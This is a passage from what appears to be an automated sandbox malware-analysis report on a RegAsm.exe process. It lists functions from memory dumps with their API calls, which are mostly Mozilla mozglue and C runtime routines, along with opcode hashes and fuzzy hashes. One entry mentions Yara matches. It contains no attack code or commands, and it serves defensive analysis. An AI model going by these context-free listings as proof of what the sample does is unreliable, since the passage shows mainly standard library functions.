                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C6DB55B
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6DB56B
                                                                                                                                                                                                                                                    • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C6DB57E
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C6DB58F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4244350000-0
                                                                                                                                                                                                                                                    • Opcode ID: 4431215301cf07cd358af9a420377f388bc7d9ba3c950306220ed635cd4764ec
                                                                                                                                                                                                                                                    • Instruction ID: 2895534b22eb4dceae476c3e11a27d8cfa3b50e277fe0858a0394e66f738869b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4431215301cf07cd358af9a420377f388bc7d9ba3c950306220ed635cd4764ec
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13210571A002059BDB008F69CC40BBABBB9FF86304F294029E818DB345E776E915C7A4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6DB7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C6DB7CF
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C6DB808
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C6DB82C
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6DB840
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6DB849
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1977084945-0
                                                                                                                                                                                                                                                    • Opcode ID: ad48d6847f5627f38193ad0edc16f92999134d4eae9fe32e155f0d0bbe4331f0
                                                                                                                                                                                                                                                    • Instruction ID: 9421b1078ed0c1f57e7bf092cfa388fd302a287a73a36f479b22c0686368b26a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad48d6847f5627f38193ad0edc16f92999134d4eae9fe32e155f0d0bbe4331f0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD2130B0E002099FDF04DFA9C8856FEBBB4EF49318F148129EC45A7341E731A944CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C736E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C736E78
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: InitializeCriticalSection.KERNEL32(6C75F618), ref: 6C736A68
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: GetCurrentProcess.KERNEL32 ref: 6C736A7D
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: GetCurrentProcess.KERNEL32 ref: 6C736AA1
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: EnterCriticalSection.KERNEL32(6C75F618), ref: 6C736AAE
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C736AE1
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C736B15
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C736B65
                                                                                                                                                                                                                                                      • Part of subcall function 6C736A10: LeaveCriticalSection.KERNEL32(6C75F618,?,?), ref: 6C736B83
                                                                                                                                                                                                                                                    • MozFormatCodeAddress.MOZGLUE ref: 6C736EC1
                                                                                                                                                                                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C736EE1
                                                                                                                                                                                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C736EED
                                                                                                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C736EFF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4058739482-0
                                                                                                                                                                                                                                                    • Opcode ID: 3c0c9d8a14e498a4781b16f3afba8b4a6cd3b30f32a42ed8124bac33087ccdc9
                                                                                                                                                                                                                                                    • Instruction ID: a3c554459445bcdebf6838de903562f3247ac2727cc9f2049fef4bf30fee91b9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c0c9d8a14e498a4781b16f3afba8b4a6cd3b30f32a42ed8124bac33087ccdc9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D21A4B1A0421A9FDB00CF69D9896AA77F5FF84308F444039E80D97241DB75AA598F92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C710D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C6D3DEF), ref: 6C710D71
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C6D3DEF), ref: 6C710D84
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C6D3DEF), ref: 6C710DAF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$Free$Alloc
                                                                                                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                    • API String ID: 1852963964-2186867486
                                                                                                                                                                                                                                                    • Opcode ID: e22ebc4b77727e23f09f6be766cca33f60b69d90aadeda2eaf5792b7121b6b93
                                                                                                                                                                                                                                                    • Instruction ID: 83a6b653180166d49aa10267eaf88f426b00bf519ad260d616cd456f1fb905f7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e22ebc4b77727e23f09f6be766cca33f60b69d90aadeda2eaf5792b7121b6b93
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ECF0E97139829823E72016660E0BFAA265D6BC2B25F788036F244DADC0DF51F43446A4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C735850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 6C73586C
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 6C735878
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C735898
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C7358C9
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7358D3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$CloseHandleObjectSingleWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1910681409-0
                                                                                                                                                                                                                                                    • Opcode ID: a3bf3fc6d555eaffe88fd0f6deb5e18726f5c2f3195f770fdcb3021e8f400186
                                                                                                                                                                                                                                                    • Instruction ID: f33c6d5cf326de386a272efb23e6c9b3e0b154a3b7c48fffad51980846662cb7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3bf3fc6d555eaffe88fd0f6deb5e18726f5c2f3195f770fdcb3021e8f400186
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24016DB17042119BDF01EF1AED08B467BB9EB833297A8417AE51AC2214DF3198168F81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C727620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C7275C4,?), ref: 6C72762B
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C7274D7,6C721385,?,?,?), ref: 6C727644
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72765A
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7274D7,6C721385,?,?,?), ref: 6C727663
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7274D7,6C721385,?,?,?), ref: 6C727677
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 418114769-0
                                                                                                                                                                                                                                                    • Opcode ID: a5a02e02e6ce0d14a0dc8f23301c568a3a4290152776102b66a86c3cf0439500
                                                                                                                                                                                                                                                    • Instruction ID: 89b6cd32b410d2d06f6fab3b10a64ad80266426fe659508bc7b6b4c3d6c945f6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5a02e02e6ce0d14a0dc8f23301c568a3a4290152776102b66a86c3cf0439500
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5F0AF71E10745ABD7008F61C888676B778FFEA359F11432AF90552601EBB0B5D08BD0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0041B091 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 0041B09D
                                                                                                                                                                                                                                                      • Part of subcall function 0041B274: __getptd_noexit.LIBCMT ref: 0041B277
                                                                                                                                                                                                                                                      • Part of subcall function 0041B274: __amsg_exit.LIBCMT ref: 0041B284
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 0041B0B4
                                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 0041B0C2
                                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 0041B0D2
                                                                                                                                                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0041B0E6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 938513278-0
                                                                                                                                                                                                                                                    • Opcode ID: 0d928877ebc791943d4d10689b8c5bc55ec061cf404d55c87710d024aa6dd3a6
                                                                                                                                                                                                                                                    • Instruction ID: dd93f3090958bbaa98d1f78f35e8e49fb1a9643f6352e1b49874271e2fde3722
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d928877ebc791943d4d10689b8c5bc55ec061cf404d55c87710d024aa6dd3a6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBF06232A41710DADA61BB7698077CE3A90EF08768F14414FF424672D2DB6C5AC1CADE
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C731700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C731800
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C713EBD,6C713EBD,00000000), ref: 6C6D42A9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                                                                                                                                                                                    • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                                                                                                                                                                                    • API String ID: 46770647-1733325692
                                                                                                                                                                                                                                                    • Opcode ID: 6ffbf24e4d7c9d915881acbdf607e2170e443cb9ff9c3f72e3999d1ab0ab7646
                                                                                                                                                                                                                                                    • Instruction ID: fa58685bea19279b648dab5b0c721f0a11c35667416c86d281e8fdc88ad1bed7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ffbf24e4d7c9d915881acbdf607e2170e443cb9ff9c3f72e3999d1ab0ab7646
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 767103B0A0074A9FC704CF28C544BAABBB1FF45314F444669D8194BB41DB70BAA9CBE2
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C73B0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,6C73B0A6,6C73B0A6,?,6C73AF67,?,00000010,?,6C73AF67,?,00000010,00000000,?,?,6C73AB1F), ref: 6C73B1F2
                                                                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C73B0A6,6C73B0A6,?,6C73AF67,?,00000010,?,6C73AF67,?,00000010,00000000,?), ref: 6C73B1FF
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C73B0A6,6C73B0A6,?,6C73AF67,?,00000010,?,6C73AF67,?,00000010), ref: 6C73B25F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$Xlength_error@std@@
                                                                                                                                                                                                                                                    • String ID: map/set<T> too long
                                                                                                                                                                                                                                                    • API String ID: 1922495194-1285458680
                                                                                                                                                                                                                                                    • Opcode ID: 31a5a8edf8e9263b41c158b3b6f810791e462007b5928a5fa0ecace2b5914d6a
                                                                                                                                                                                                                                                    • Instruction ID: 3a920e23248c6576ca465cccc7c4dcd0546232da1c27a390e7835e1490c0ba1a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31a5a8edf8e9263b41c158b3b6f810791e462007b5928a5fa0ecace2b5914d6a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60617874A006558FD701CF19CA84A9ABBF1BF4A358F28C1A9D85D8BB52C331FC45CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C722CF0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 160COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C722E2D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __acrt_iob_func
                                                                                                                                                                                                                                                    • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                                                                                    • API String ID: 711238415-4149320968
                                                                                                                                                                                                                                                    • Opcode ID: 7f5bf1ccd6d7e39b2660ae7a2823e2bed3741bfd11bcfb787d0ae50ad1468757
                                                                                                                                                                                                                                                    • Instruction ID: 2e4b95be9dd58d17cac4a9ea2e186e04bf9c1c3d222c7a960f0cf518aa1cbc13
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f5bf1ccd6d7e39b2660ae7a2823e2bed3741bfd11bcfb787d0ae50ad1468757
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4651D1B06083808FC724CF34C58959FB7E5AFC9268F50892DE5DA87750EB34E945CB46
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6FD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD4F2
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD50B
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DCFE0: EnterCriticalSection.KERNEL32(6C75E784), ref: 6C6DCFF6
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DCFE0: LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6DD026
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD52E
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C6FD690
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD751
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
